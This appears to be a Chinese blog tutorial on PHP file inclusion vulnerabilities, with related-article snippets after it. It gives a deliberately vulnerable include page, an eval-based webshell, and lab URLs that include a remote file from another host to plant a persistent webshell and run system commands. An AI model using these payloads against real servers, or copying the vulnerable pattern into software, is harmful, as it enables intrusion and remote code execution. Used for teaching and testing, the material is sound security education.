文件包含漏洞-基本原理

已于 2023-05-02 23:13:02 修改
阅读量139 收藏
点赞数
文章标签: php 安全 web安全
于 2023-04-24 13:56:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Echo__h/article/details/130341135
版权

文件包含漏洞

文件包含漏洞其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。

有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞

一、本地文件包含

本地文件包含指的是能够打开并包含本地文件的漏洞

1.利用条件

php.ini中allow_url_fopen = on (默认开启)

用户参数可控且没有进行过滤

2.代码示例
# 存在漏洞的php站点示例
<?php

$filename = $_GET['filename'];
include $filename;

echo "<hr>hello,world.";

?>

# 漏洞利用示例

http://localhost/learn/fileinc.php?filename=c:\users\administrator\desktop\test.txt

image-20230424083237668

*由于include等文件包含函数的特性,可以读取任何有权限的文件,或者执行恶意脚本。

二、远程文件包含
1.利用条件

php.ini中allow_url_fopen = on(默认开启) 和 allow_url_include = on (默认关闭)

用户参数可控且没有进行过滤

image-20230424090029057

2.代码示例

创建shell.php,用于漏洞利用执行

<?php

$code = $_GET['code'];
eval($code);

?>

# 漏洞利用
http://localhost/learn/fileinc.php?filename=http://192.168.30.103/security/shell.php?code=phpinfo();

image-20230424135432354

注意:这里发现显示的信息是本地主机的而不是靶机的,因为php脚本被本地执行了

因此需要更改包含的文件类型,不能是php文件,同时参数需要将“?”更改为“&”

http://localhost/learn/fileinc.php?filename=http://192.168.30.103/security/shell.txt&code=phpinfo();

image-20230424135509570

可以看到这样显示的才是存在漏洞的主机的信息

include或者其他文件包含函数可以包含非php文件,若内容为有效的php代码,则会被执行。

3.漏洞利用实验

①将shell.txt写入一句话

<?php 
    file_put_contents('temp/shell.php', '<?php @eval($_GET['code']); ?>'); 
?>

②远程主机包含shell.txt

http://192.168.30.1/learn/fileinc.php?filename=http://192.168.30.103/security/shell.txt

③成功在远程主机写入php木马后进行利用

http://192.168.30.1/learn/temp/shell.php?code=system('ipconfig');
ZeroK_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
08_理论8_文件包含漏洞的原理与实践_20180921
02-10
08_理论8_文件包含漏洞的原理与实践_20180921
文件包含漏洞(原理及介绍)
未来社会二十年发展的核心技术趋势由ABCD四个字母组成,分别是AI(人工智能)、BlockChain(区块链)、Cloud(云)、和Data(大数据)每一次进步都有新的认知和感触
12-08 5650
File inclusion,文件包含漏洞)。程序开发人员通常出于灵活性的考虑,会将被包含的文件设置成变量,然后动态调用这些文件。但正是因为调用的灵活性导致用户可能调用一些恶意文件,造成文件包含漏洞文件包含漏洞分为本地文件包含漏洞和远程文件包含漏洞.
文件包含漏洞详解
剁椒鱼头没剁椒的博客
12-01 3946
文件包含漏洞就是使用函数去包含任意文件的时候,当包含的文件来源过滤不严谨的时候,当存在包含恶意文件后,就可以通过这个恶意的文件来达到相应的目的。file : // #访问本地文件系统 http : // #访问HTTPs网址 ftp : // #访问ftp URL php : // #访问输入输出流 zlib : // #压缩流 data : // #数据 ssh2 : // #security shell2 expect : // #处理交互式的流 glob : // #查找匹配的文件路径。
网络安全-文件包含漏洞原理、攻击及防御
关注网络安全、云原生安全
08-14 5585
目录 简介 类型 原理 攻击 防御 简介 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 类型 根据不同的配置环境,文件包含漏洞分为如下两种情况:1.本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击者更多的会包含一些固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。2.远程文件
文件包含漏洞及原理
m0_68019293的博客
03-29 7555
什么是文件包含漏洞 1:随着网站的业务的需求,程序开发人员一般希望代码更加灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校检或者校检被绕过就造成了文件包含漏洞。 经常见到的函数 1:include()当前使用该函数包含文件时,只有代码执行到include()函数时将文件包含起来,发生错误时给出一个警告,然后继续执行语句 2,include_once()功能和include()相同,区别当重复调
文件包含漏洞、原理、利用
m0_52556798的博客
03-28 4167
最近的总结都比较简单,但不是在水,只是在我学习过程中总结的觉得真的有用的知识,还有就是有些代码发不出来我也没办法,所以就有所调整。 文件包含原理是啥? 文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时, 就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件, 此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。 讲讲
Web应用安全文件包含漏洞简介.pptx
06-18
文件包含漏洞简介 文件包含漏洞简介 1、什么是文件包含漏洞? 开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写,这种调用文件的过程一般被称为包含。 为了使...
Apache-Tomcat从文件包含到RCE漏洞原理深入分析1
08-03
漏洞简介2020年02月20日,于CNVD公开的漏洞公告中发现Apache Tomcat文件包含漏洞(CVE-2020-1938)。Apache Tomcat为
一文详解文件包含漏洞
MachineGunJoe666
06-10 1538
file:// #访问本地文件系统http:// #访问HTTPs网址ftp:// #访问ftp URLphp:// #访问输入输出流zlib:// #压缩流data:// #数据expect:// #处理交互式的流glob:// #查找匹配的文件路径。
(31)【文件包含漏洞】简介、原理、危害、分类、函数、伪协议、利用过程……
04-10 3563
web-文件包含漏洞
文件包含漏洞
qz362228的博客
04-23 994
文章目录前言一、文件包含漏洞原理二、利用方式三、常用的防御方式四、绕过方式LFI漏洞利用技巧1.字符串截断--00截断2.配合文件上传总结 前言 一、文件包含漏洞原理 原理: 在通过PHP的相应函数(如:include())引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 (这可能有点难理解,那我们先来了解一下包含的概念,进而理解此原理) 1.什么是文件包含文件包含就是把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用
文件包含漏洞的原理
孤的博客
11-23 1237
文件包含 开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含文件包含漏洞 开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞。 几乎所有脚本语言都会提供文件包含的功能,但文件包含漏洞PHP Web Application中居多。 文件包含分类 1.本地...
文件包含漏洞原理
qq_42133828的博客
11-10 7067
什么是文件包含漏洞PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。最常见的就属于本地文件包含(Local File Inclusion)漏洞了。 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为...
Web安全实战系列:文件包含漏洞
gclome的博客
11-07 502
**本文转自:freebuf 山东安山** 前言 《Web安全实战》系列集合了WEB类常见的各种漏洞,笔者根据自己在Web安全领域中学习和工作的经验,对漏洞原理和漏洞利用面进行了总结分析,致力于漏洞准确性、丰富性,希望对WEB安全工作者、WEB安全学习者能有所帮助,减少获取知识的时间成本。 0x01 文件包含简介 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件...
简述文件包含漏洞的原理
最新发布
06-13
文件包含漏洞的原理是Web应用程序在调用其他文件时没有进行充分的过滤和检查,导致攻击者可以通过构造恶意的参数来访问非授权的文件,并执行其中的代码。常见的文件包含漏洞有两种类型:本地文件包含和远程文件包含...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值